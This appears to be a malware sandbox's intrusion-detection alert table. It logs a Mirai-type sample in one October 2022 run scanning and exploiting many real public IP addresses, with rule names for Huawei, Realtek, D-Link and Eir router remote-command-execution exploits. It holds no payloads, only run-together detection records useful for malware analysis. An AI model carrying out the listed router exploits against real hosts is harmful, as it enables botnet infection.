                            192.168.2.2382.198.77.25354220802846380 10/23/22-17:58:06.175330TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5422080192.168.2.2382.198.77.253
                            192.168.2.2385.92.111.13534280802846457 10/23/22-17:58:17.678157TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3428080192.168.2.2385.92.111.135
                            192.168.2.2378.230.187.4353298802846457 10/23/22-17:58:28.643775TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5329880192.168.2.2378.230.187.43
                            192.168.2.23195.216.39.5836876802846457 10/23/22-17:58:30.763687TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3687680192.168.2.23195.216.39.58
                            192.168.2.2382.64.185.16054456802846380 10/23/22-17:57:54.175536TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5445680192.168.2.2382.64.185.160
                            192.168.2.2389.251.225.20148082802846457 10/23/22-17:58:32.892637TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4808280192.168.2.2389.251.225.201
                            192.168.2.2361.6.200.14240702802846457 10/23/22-17:57:20.919307TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4070280192.168.2.2361.6.200.142
                            192.168.2.2388.209.229.16442788802027121 10/23/22-17:56:51.064127TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4278880192.168.2.2388.209.229.164
                            192.168.2.2395.104.29.20848330802027121 10/23/22-17:58:07.403642TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4833080192.168.2.2395.104.29.208
                            192.168.2.2337.77.74.2554966528692027339 10/23/22-17:58:30.489822TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5496652869192.168.2.2337.77.74.25
                            192.168.2.2380.85.21.6055272802846457 10/23/22-17:57:09.771575TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5527280192.168.2.2380.85.21.60
                            192.168.2.2385.9.26.9258688802846457 10/23/22-17:58:17.716270TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5868880192.168.2.2385.9.26.92
                            192.168.2.2382.165.71.12838202802846380 10/23/22-17:58:06.174589TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3820280192.168.2.2382.165.71.128
                            192.168.2.23197.166.86.13836714802841623 10/23/22-17:56:55.865563TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3671480192.168.2.23197.166.86.138
                            192.168.2.2385.222.146.1942650802846457 10/23/22-17:57:16.979034TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4265080192.168.2.2385.222.146.19
                            192.168.2.23122.201.66.6058952802846457 10/23/22-17:58:35.080206TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5895280192.168.2.23122.201.66.60
                            192.168.2.2395.101.201.9950354802027121 10/23/22-17:57:12.971445TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5035480192.168.2.2395.101.201.99
                            192.168.2.235.149.93.12047320802846457 10/23/22-17:57:35.685100TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4732080192.168.2.235.149.93.120
                            192.168.2.2385.94.202.14941872802846457 10/23/22-17:58:26.402400TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4187280192.168.2.2385.94.202.149
                            192.168.2.2388.96.178.22050648802027121 10/23/22-17:57:52.320435TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5064880192.168.2.2388.96.178.220
                            192.168.2.235.133.103.7253228802846457 10/23/22-17:57:35.659143TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5322880192.168.2.235.133.103.72
                            192.168.2.235.9.198.1949044802846457 10/23/22-17:56:55.093874TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4904480192.168.2.235.9.198.19
                            192.168.2.23188.65.18.11042522802846457 10/23/22-17:57:47.821744TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4252280192.168.2.23188.65.18.110
                            192.168.2.235.205.193.4854026802846457 10/23/22-17:57:35.654428TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5402680192.168.2.235.205.193.48
                            192.168.2.23122.116.94.9237090802835221 10/23/22-17:57:28.658822TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)3709080192.168.2.23122.116.94.92
                            192.168.2.23156.241.63.24946378802835222 10/23/22-17:57:58.955977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4637880192.168.2.23156.241.63.249
                            192.168.2.2388.208.249.16341294802027121 10/23/22-17:57:13.368317TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4129480192.168.2.2388.208.249.163
                            192.168.2.2346.101.143.10554114802846457 10/23/22-17:58:23.966848TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5411480192.168.2.2346.101.143.105
                            192.168.2.2388.198.127.14154030802027121 10/23/22-17:57:21.283853TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5403080192.168.2.2388.198.127.141
                            192.168.2.2379.143.177.11741010802835221 10/23/22-17:57:01.100624TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)4101080192.168.2.2379.143.177.117
                            192.168.2.2361.239.169.10942960802846457 10/23/22-17:58:02.984285TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4296080192.168.2.2361.239.169.109
                            192.168.2.23216.197.110.24958620802835222 10/23/22-17:58:32.149349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5862080192.168.2.23216.197.110.249
                            192.168.2.23213.27.82.1533414802846380 10/23/22-17:56:58.268393TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3341480192.168.2.23213.27.82.15
                            192.168.2.2335.76.110.7749512802841623 10/23/22-17:57:43.028125TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4951280192.168.2.2335.76.110.77
                            192.168.2.2395.105.33.4943682802027121 10/23/22-17:58:37.516252TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4368280192.168.2.2395.105.33.49
                            192.168.2.2395.168.225.7651838802027121 10/23/22-17:57:23.621204TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5183880192.168.2.2395.168.225.76
                            192.168.2.23188.127.227.537096802846457 10/23/22-17:58:17.689048TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3709680192.168.2.23188.127.227.5
                            192.168.2.232.21.167.17850914802846457 10/23/22-17:57:50.347635TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5091480192.168.2.232.21.167.178
                            192.168.2.23164.46.38.21440992802846457 10/23/22-17:56:52.405053TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4099280192.168.2.23164.46.38.214
                            192.168.2.23156.234.29.10749996802835221 10/23/22-17:57:16.579158TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)4999680192.168.2.23156.234.29.107
                            192.168.2.23181.212.129.4058548802846380 10/23/22-17:57:25.375918TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5854880192.168.2.23181.212.129.40
                            192.168.2.2395.86.106.1436922802027121 10/23/22-17:57:33.493683TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3692280192.168.2.2395.86.106.14
                            192.168.2.2346.167.244.7350194802846457 10/23/22-17:58:15.369700TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5019480192.168.2.2346.167.244.73
                            192.168.2.2346.227.228.12348044802846457 10/23/22-17:58:23.919255TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4804480192.168.2.2346.227.228.123
                            192.168.2.2395.131.48.14152828802027121 10/23/22-17:58:37.349008TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5282880192.168.2.2395.131.48.141
                            192.168.2.23142.217.11.1363890475472835222 10/23/22-17:57:04.158370TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)389047547192.168.2.23142.217.11.136
                            192.168.2.2388.159.151.19138070802027121 10/23/22-17:57:31.198661TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3807080192.168.2.2388.159.151.191
                            192.168.2.235.182.248.853140802846457 10/23/22-17:57:35.592639TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5314080192.168.2.235.182.248.8
                            192.168.2.23176.31.131.5048328802841623 10/23/22-17:57:42.978234TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4832880192.168.2.23176.31.131.50
                            192.168.2.23103.122.247.12445666802841623 10/23/22-17:57:55.522647TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4566680192.168.2.23103.122.247.124
                            192.168.2.2395.100.200.1951046802027121 10/23/22-17:57:10.331083TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5104680192.168.2.2395.100.200.19
                            192.168.2.23169.197.105.12555642802846380 10/23/22-17:56:58.117829TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5564280192.168.2.23169.197.105.125
                            192.168.2.2385.115.221.758258802846457 10/23/22-17:57:41.272377TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5825880192.168.2.2385.115.221.7
                            192.168.2.23188.93.57.22634070802846457 10/23/22-17:58:07.975888TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3407080192.168.2.23188.93.57.226
                            192.168.2.23164.138.115.15240572528692027339 10/23/22-17:57:22.360224TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4057252869192.168.2.23164.138.115.152
                            192.168.2.23213.139.90.6856982802846380 10/23/22-17:56:39.207635TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5698280192.168.2.23213.139.90.68
                            192.168.2.2384.113.79.17847614802846457 10/23/22-17:58:15.349677TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4761480192.168.2.2384.113.79.178
                            192.168.2.2395.100.149.20560382802027121 10/23/22-17:57:16.182795TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6038280192.168.2.2395.100.149.205
                            192.168.2.23144.76.31.1473692480802841623 10/23/22-17:57:46.449872TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)369248080192.168.2.23144.76.31.147
                            192.168.2.23112.74.203.18250200802027121 10/23/22-17:58:25.658198TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5020080192.168.2.23112.74.203.182
                            192.168.2.235.251.51.22643580802846457 10/23/22-17:57:03.002530TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4358080192.168.2.235.251.51.226
                            192.168.2.2395.142.91.24144480802027121 10/23/22-17:57:13.187469TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4448080192.168.2.2395.142.91.241
                            192.168.2.23110.43.204.8247202802846457 10/23/22-17:57:43.762005TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4720280192.168.2.23110.43.204.82
                            192.168.2.2361.241.44.1348008802846457 10/23/22-17:57:50.923581TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4800880192.168.2.2361.241.44.13
                            192.168.2.2395.179.132.22838894802027121 10/23/22-17:57:12.973047TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3889480192.168.2.2395.179.132.228
                            192.168.2.23195.29.82.2341586802846457 10/23/22-17:57:59.916298TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4158680192.168.2.23195.29.82.23
                            192.168.2.2395.216.184.21635280802027121 10/23/22-17:57:54.640552TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3528080192.168.2.2395.216.184.216
                            192.168.2.2388.112.35.11135672802027121 10/23/22-17:58:29.914258TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3567280192.168.2.2388.112.35.111
                            192.168.2.23200.123.142.8537142802846380 10/23/22-17:57:58.047528TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3714280192.168.2.23200.123.142.85
                            192.168.2.23213.102.76.10854104802846380 10/23/22-17:58:33.254434TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5410480192.168.2.23213.102.76.108
                            192.168.2.2395.79.109.20452060802027121 10/23/22-17:57:16.196003TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5206080192.168.2.2395.79.109.204
                            192.168.2.2385.116.124.11460230802846457 10/23/22-17:57:31.285712TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6023080192.168.2.2385.116.124.114
                            192.168.2.23178.239.222.953806802846380 10/23/22-17:56:49.757764TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5380680192.168.2.23178.239.222.9
                            192.168.2.2388.216.187.19551932802027121 10/23/22-17:58:10.243378TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5193280192.168.2.2388.216.187.195
                            192.168.2.23200.183.48.17441148802846380 10/23/22-17:57:43.908593TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4114880192.168.2.23200.183.48.174
                            192.168.2.23122.249.243.23437700802846457 10/23/22-17:58:20.130052TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3770080192.168.2.23122.249.243.234
                            192.168.2.2380.151.86.19950792802846457 10/23/22-17:58:13.019043TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5079280192.168.2.2380.151.86.199
                            192.168.2.23178.79.144.3344066802846380 10/23/22-17:57:55.407757TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4406680192.168.2.23178.79.144.33
                            192.168.2.2385.241.201.9042092802846457 10/23/22-17:58:37.542131TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4209280192.168.2.2385.241.201.90
                            192.168.2.232.182.109.15639428802846457 10/23/22-17:57:03.498337TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3942880192.168.2.232.182.109.156
                            192.168.2.2379.106.155.155628475472023548 10/23/22-17:56:53.678013TCP2023548ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE562847547192.168.2.2379.106.155.15
                            192.168.2.23156.254.104.18939108802835222 10/23/22-17:57:23.500357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3910880192.168.2.23156.254.104.189
                            192.168.2.2388.100.220.11954706802027121 10/23/22-17:57:49.369995TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5470680192.168.2.2388.100.220.119
                            192.168.2.23213.63.142.7745876802846380 10/23/22-17:57:54.148119TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4587680192.168.2.23213.63.142.77
                            192.168.2.23200.122.88.158840802846380 10/23/22-17:57:43.224412TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5884080192.168.2.23200.122.88.1
                            192.168.2.2346.28.44.12760174802846457 10/23/22-17:58:23.965267TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6017480192.168.2.2346.28.44.127
                            192.168.2.23195.20.52.18047834802846457 10/23/22-17:56:43.200673TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4783480192.168.2.23195.20.52.180
                            192.168.2.2395.183.53.8554192802027121 10/23/22-17:56:53.257650TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5419280192.168.2.2395.183.53.85
                            192.168.2.2346.101.80.4854414802846457 10/23/22-17:58:23.936940TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5441480192.168.2.2346.101.80.48
                            192.168.2.23178.18.100.16160860802846380 10/23/22-17:57:49.425657TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6086080192.168.2.23178.18.100.161
                            192.168.2.23171.4.45.20138518802846457 10/23/22-17:56:55.069504TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3851880192.168.2.23171.4.45.201
                            192.168.2.2346.3.113.18542070802846457 10/23/22-17:58:05.661025TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4207080192.168.2.2346.3.113.185
                            192.168.2.2384.238.211.17251832802846457 10/23/22-17:57:56.410084TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5183280192.168.2.2384.238.211.172
                            192.168.2.2385.210.58.4753630802846457 10/23/22-17:57:31.246009TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5363080192.168.2.2385.210.58.47
                            192.168.2.2383.140.156.11541696802846380 10/23/22-17:58:27.232677TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4169680192.168.2.2383.140.156.115
                            192.168.2.2388.198.122.21058200802027121 10/23/22-17:57:02.444082TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5820080192.168.2.2388.198.122.210
                            192.168.2.23206.189.124.16848686802846380 10/23/22-17:58:39.278764TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4868680192.168.2.23206.189.124.168
                            192.168.2.232.134.160.16644262802846457 10/23/22-17:57:21.039601TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4426280192.168.2.232.134.160.166
                            192.168.2.2386.125.36.19355200802846380 10/23/22-17:58:19.935272TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5520080192.168.2.2386.125.36.193
                            192.168.2.2395.216.209.13035434802027121 10/23/22-17:57:49.370080TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3543480192.168.2.2395.216.209.130
                            192.168.2.2386.18.52.1952250802846380 10/23/22-17:57:03.509591TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5225080192.168.2.2386.18.52.19
                            192.168.2.2385.13.189.14347472802846457 10/23/22-17:58:26.435827TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4747280192.168.2.2385.13.189.143
                            192.168.2.235.62.37.24154112528692027339 10/23/22-17:57:35.281734TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5411252869192.168.2.235.62.37.241
                            192.168.2.2386.49.88.6844090802846380 10/23/22-17:57:07.231236TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4409080192.168.2.2386.49.88.68
                            192.168.2.2395.216.137.11934560802027121 10/23/22-17:57:38.647172TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3456080192.168.2.2395.216.137.119
                            192.168.2.2395.101.246.6035808802027121 10/23/22-17:57:21.027576TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3580880192.168.2.2395.101.246.60
                            192.168.2.23122.117.64.9551444802846457 10/23/22-17:58:02.783091TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5144480192.168.2.23122.117.64.95
                            192.168.2.2388.209.229.12640488802027121 10/23/22-17:57:38.611987TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4048880192.168.2.2388.209.229.126
                            192.168.2.2395.86.107.25533514802027121 10/23/22-17:58:24.061225TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3351480192.168.2.2395.86.107.255
                            192.168.2.2346.101.132.20257296802846457 10/23/22-17:57:53.192191TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5729680192.168.2.2346.101.132.202
                            192.168.2.23112.80.145.19634064802027121 10/23/22-17:56:45.932630TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3406480192.168.2.23112.80.145.196
                            192.168.2.2380.249.162.20952994802846380 10/23/22-17:57:11.381212TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5299480192.168.2.2380.249.162.209
                            192.168.2.23213.219.238.6041306802846380 10/23/22-17:56:39.207705TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4130680192.168.2.23213.219.238.60
                            192.168.2.2395.154.201.1749030802027121 10/23/22-17:57:28.450137TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4903080192.168.2.2395.154.201.17
                            192.168.2.2346.109.13.1650084802846457 10/23/22-17:58:23.953618TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5008480192.168.2.2346.109.13.16
                            192.168.2.2395.58.51.23142938802027121 10/23/22-17:58:07.450809TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4293880192.168.2.2395.58.51.231
                            192.168.2.2388.221.232.12851092802027121 10/23/22-17:56:39.143232TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5109280192.168.2.2388.221.232.128
                            192.168.2.23213.87.103.7847822802846380 10/23/22-17:56:47.121117TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4782280192.168.2.23213.87.103.78
                            192.168.2.23122.252.13.12746600802846457 10/23/22-17:57:14.309344TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4660080192.168.2.23122.252.13.127
                            192.168.2.2380.13.134.22353186802846457 10/23/22-17:57:09.737426TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5318680192.168.2.2380.13.134.223
                            192.168.2.23156.67.251.18037570802835222 10/23/22-17:57:25.165890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3757080192.168.2.23156.67.251.180
                            192.168.2.2383.69.237.4036548802846380 10/23/22-17:57:01.378497TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3654880192.168.2.2383.69.237.40
                            192.168.2.2395.110.200.23234112802027121 10/23/22-17:57:52.106593TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3411280192.168.2.2395.110.200.232
                            192.168.2.2395.107.213.9935238802027121 10/23/22-17:58:12.793297TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3523880192.168.2.2395.107.213.99
                            192.168.2.2384.33.242.7859182802846457 10/23/22-17:57:56.404839TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5918280192.168.2.2384.33.242.78
                            192.168.2.2361.67.14.9148966802846457 10/23/22-17:57:31.852938TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4896680192.168.2.2361.67.14.91
                            192.168.2.2382.211.58.2960172802846380 10/23/22-17:58:06.169767TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6017280192.168.2.2382.211.58.29
                            192.168.2.23156.240.228.13733426802841623 10/23/22-17:58:35.805001TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3342680192.168.2.23156.240.228.137
                            192.168.2.2388.86.101.5242950802027121 10/23/22-17:58:29.901981TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4295080192.168.2.2388.86.101.52
                            192.168.2.2385.229.82.13138664802846457 10/23/22-17:57:31.246108TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3866480192.168.2.2385.229.82.131
                            192.168.2.23164.39.153.8258878802846457 10/23/22-17:57:22.351125TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5887880192.168.2.23164.39.153.82
                            192.168.2.23112.196.88.2539984802027121 10/23/22-17:58:25.337026TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3998480192.168.2.23112.196.88.25
                            192.168.2.2382.64.241.11558706802846380 10/23/22-17:58:06.155798TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5870680192.168.2.2382.64.241.115
                            192.168.2.23213.247.42.18050126802846380 10/23/22-17:57:03.533357TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5012680192.168.2.23213.247.42.180
                            192.168.2.2389.163.224.548962802846457 10/23/22-17:57:41.161507TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4896280192.168.2.2389.163.224.5
                            192.168.2.235.180.211.4734354802846457 10/23/22-17:57:08.382034TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3435480192.168.2.235.180.211.47
                            192.168.2.2395.217.229.18236046802027121 10/23/22-17:57:49.328686TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3604680192.168.2.2395.217.229.182
                            192.168.2.2337.1.210.24457176802846457 10/23/22-17:56:51.962090TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5717680192.168.2.2337.1.210.244
                            192.168.2.2341.84.236.4458066802835221 10/23/22-17:57:28.583889TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)5806680192.168.2.2341.84.236.44
                            192.168.2.2389.22.112.1160160802846457 10/23/22-17:57:55.908279TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6016080192.168.2.2389.22.112.11
                            192.168.2.2389.165.9.5442650802846457 10/23/22-17:58:07.972110TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4265080192.168.2.2389.165.9.54
                            192.168.2.2395.110.132.22442362802027121 10/23/22-17:58:15.281877TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4236280192.168.2.2395.110.132.224
                            192.168.2.23169.60.175.3833006802846380 10/23/22-17:57:33.476688TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3300680192.168.2.23169.60.175.38
                            192.168.2.23195.201.2.5543710802846457 10/23/22-17:58:30.729836TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4371080192.168.2.23195.201.2.55
                            192.168.2.2388.114.129.16934894802027121 10/23/22-17:58:02.135809TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3489480192.168.2.2388.114.129.169
                            192.168.2.2380.84.57.11652814802846457 10/23/22-17:56:48.732067TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5281480192.168.2.2380.84.57.116
                            192.168.2.23156.254.40.18843532372152835222 10/23/22-17:58:24.312578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4353237215192.168.2.23156.254.40.188
                            192.168.2.2388.99.131.20341470802027121 10/23/22-17:57:12.950604TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4147080192.168.2.2388.99.131.203
                            192.168.2.2314.67.78.2374459475472023548 10/23/22-17:57:20.639792TCP2023548ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE445947547192.168.2.2314.67.78.237
                            192.168.2.2380.90.61.3435636802846380 10/23/22-17:57:11.363885TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3563680192.168.2.2380.90.61.34
                            192.168.2.2341.225.51.14050464802841623 10/23/22-17:58:29.466955TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5046480192.168.2.2341.225.51.140
                            192.168.2.23181.52.121.1442868802846380 10/23/22-17:56:59.705405TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4286880192.168.2.23181.52.121.14
                            192.168.2.23213.207.143.2444278802846380 10/23/22-17:58:00.654260TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4427880192.168.2.23213.207.143.24
                            192.168.2.2388.221.79.1657016802027121 10/23/22-17:58:36.284301TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5701680192.168.2.2388.221.79.16
                            192.168.2.2388.219.3.7558646802027121 10/23/22-17:58:32.666847TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5864680192.168.2.2388.219.3.75
                            192.168.2.23178.91.185.3136860802846380 10/23/22-17:57:28.053844TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3686080192.168.2.23178.91.185.31
                            192.168.2.23156.255.164.18741856802835221 10/23/22-17:57:28.948733TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)4185680192.168.2.23156.255.164.187
                            192.168.2.23138.68.139.15245880802835222 10/23/22-17:57:20.079588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4588080192.168.2.23138.68.139.152
                            192.168.2.2386.62.28.7751294802846380 10/23/22-17:57:35.745807TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5129480192.168.2.2386.62.28.77
                            192.168.2.23178.62.220.18543428802846380 10/23/22-17:58:13.123154TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4342880192.168.2.23178.62.220.185
                            192.168.2.23112.169.184.6840252802027121 10/23/22-17:58:29.877211TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4025280192.168.2.23112.169.184.68
